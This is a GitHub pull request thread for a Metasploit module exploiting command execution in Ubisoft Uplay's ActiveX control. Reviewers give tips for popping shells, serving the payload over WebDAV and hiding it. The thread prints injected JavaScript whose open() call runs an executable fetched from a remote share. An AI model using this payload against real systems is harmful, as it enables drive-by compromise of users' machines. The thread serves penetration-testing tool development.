Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ubisoft uplay Active X control Command Execution #653

Merged
merged 8 commits into from Aug 6, 2012

Conversation

Projects
None yet
3 participants
@Meatballs1
Copy link
Contributor

commented Jul 30, 2012

This allows the user to run any windows commands.

Tested in WinXP and IE.

Did not appear to work in Win7.

Patched as of today, good turnaround Ubisoft.

Could use some hints as how to have a 'command line' payload and base64 encoding. Not tested the autopwn features (copied from template exploit). Areas I still need to work out!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 31, 2012

Thanks for the module. However, exploits are required to pop shells, and to me that looks like you're only popping a calc.exe.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 31, 2012

If you can pass params, then you can write a staged payload for it. If you can only tell it which executable to run, you may want to try to serve the exe from webdav.

@h0ng10

This comment has been minimized.

Copy link
Contributor

commented Jul 31, 2012

As far as I know, this should also work with other browsers, not just IE. Mozilla blocks it
https://addons.mozilla.org/en-US/firefox/blocked/p113

@Meatballs1

This comment has been minimized.

Copy link
Contributor Author

commented Jul 31, 2012

Yeah I tried in Firefox but the ActiveX wasn't registered with it. Dunno how firefox loads them if its not looking at the same registry keys as IE though.

Looking at serving it payload over WebDAV, if not it can be served over SMB.

@h0ng10

This comment has been minimized.

Copy link
Contributor

commented Jul 31, 2012

SMB will be difficult as far as I know Metasploit doesn't provide a SMB server yet (it's on my wishlist for some time). Also webdav should be preferred for browser exploits, as a firewall between the client and the exploit server might block smb requests.

@Meatballs1

This comment has been minimized.

Copy link
Contributor Author

commented Jul 31, 2012

WebDAV working, thanks to HDM, just need to clean it up so it knows when to serve the HTML and when to serve the payload.

@Meatballs1

This comment has been minimized.

Copy link
Contributor Author

commented Jul 31, 2012

If you wish to test it I have the 2.03 installer. It updates pretty quickly so majority of people won't be vulnerable anymore unless they're in offline mode.

Install
Turn off internet
Load
Login
Settings > Offline mode
Turn internet back on if you wish.

No idea why classid isn't picked up in browser autopwn, the plugin doesn't list in IEs installed programs, but is in the registry etc.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2012

Yeah, I do need the installer actually... could you please e-mail me? sinn3r[at]metasploit.com. Thanks!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2012

Module isn't working for me.

So issue #1, in this line:

path = "#{@exploit_unc}#{@share_name}#{@basename}.exe"

That for me is missing a "" in the path, so I had to change that:

path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"

Issue #2: even though the path is right, webdav doesn't seem to launch by the open() function. It launches UPlay, but no WebDav requests are actually made according to my Wireshark log. However, if I manually launch webdav, and then double click on the exe, it works. So that indicates webdav is actually working, it's just not launched for some reason. Here's an example of the source for open():

x.open('-orbit_product_id 1 -orbit_exe_path XFwxOTIuMTY4LjIzMi4xXFVjU2dWUk9sXFRGbWp4bUhyLmV4ZQ== uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');

By the way, here's a trick you can use to hide the executable (you can do a grep on "ishidden" in the exploits directory to find examples):
http://pastebin.com/W81SfjUh

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2012

And by the way, if it only works on some Windows/IE setups, it's better to check the user-agent in on_request_uri() before you actually send the exploit. For unsupported targets, you can just send a fake 404.

@Meatballs1

This comment has been minimized.

Copy link
Contributor Author

commented Aug 2, 2012

Hmm uplay_steam_mode missing a - in your paste.

What did you test under, Win7?, and did you have your credentials saved for autologin?

For me in Win7 uplay gets loaded, but the call to the exe never occurs. I've not worked out how this is different than XP though. I expect its more likely to be the difference between IE8 and IE9 with the javascript handling or somesuch.

url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"

path = "#{@exploit_unc}#{@share_name}#{@basename}.exe"

This comment has been minimized.

Copy link
@Meatballs1

Meatballs1 Aug 2, 2012

Author Contributor

Missing \ ?

Probably has worked without because WebDAV just checks the path contains the exe name and serves the payload despite path being wrong :)

<script>
x = document.createElement('OBJECT');
x.classid='#{classid}';document.body.appendChild(x);
x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');

This comment has been minimized.

Copy link
@Meatballs1

Meatballs1 Aug 2, 2012

Author Contributor

check -uplay_steam_mode is intact?


include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,

This comment has been minimized.

Copy link
@Meatballs1

Meatballs1 Aug 2, 2012

Author Contributor

Check OS?

end

def process_get(cli, request)

This comment has been minimized.

Copy link
@Meatballs1

Meatballs1 Aug 2, 2012

Author Contributor

Check OS?

@Meatballs1

This comment has been minimized.

Copy link
Contributor Author

commented Aug 2, 2012

Just tested it on another machine - work_offline doesn't appear to stop the update process but specifying a invalid proxy prevents it.

Double check it's not sneakily updated you to 2.04 already!

@Meatballs1

This comment has been minimized.

Copy link
Contributor Author

commented Aug 2, 2012

Hmm tested in Win7 again on a different host, and calc worked:

Was going to watch procmon to see if anything is different but handily this logfile is used:

C:\Program Files\Ubisoft\Ubisoft Game Launcher\logs\launcher_log.txt

2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (162) -- Starting Ubisoft Game Launcher --
2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (166) Platform: PC.
2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (169) Version: 640.
2012-08-02 13:04:12 [ 4912] INFO HubUtils.cpp (170) Built: Jul 12 2012.
2012-08-02 13:04:16 [ 4912] INFO HubUtils.cpp (182) Command line: "-orbit_product_id" "1" "-orbit_exe_path" "Y2FsYy5leGU=" "-uplay_steam_mode" "" "-uplay_dev_mode" "" "-uplay_dev_mode_auto_play" ""
2012-08-02 13:04:16 [ 4912] INFO Hub.cpp (197) Environment is PROD.
2012-08-02 13:04:17 [ 4812] INFO Settings.cpp (111) Applying forced proxy settings, proxy is 111111111111:80.
2012-08-02 13:04:17 [ 4204] ERROR CheckForStartupGameJob.cpp (49) No configuration found for startup product 1
2012-08-02 13:04:20 [ 4204] ERROR PatchDownloadJob.cpp (277) Failed to get remote forced version. Url is http://static3.cdn.ubi.com/orbit/uplay_launcher_2_0/patches/PC/forced.txt.
2012-08-02 13:04:23 [ 4204] ERROR PatchDownloadJob.cpp (357) Failed to get remote version. Url is http://static3.cdn.ubi.com/orbit/uplay_launcher_2_0/patches/PC/latest.txt.
2012-08-02 13:04:23 [ 5052] ERROR LauncherPatcher.cpp (239) Failed to download patch.
2012-08-02 13:04:23 [ 5052] INFO GameSessionHandler.cpp (560) Dev mode auto play, starting game.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 3, 2012

I actually didn't sign up for an account, I'll have to do this again.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 6, 2012

On this......

@wchen-r7 wchen-r7 merged commit 1aacea9 into rapid7:master Aug 6, 2012

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.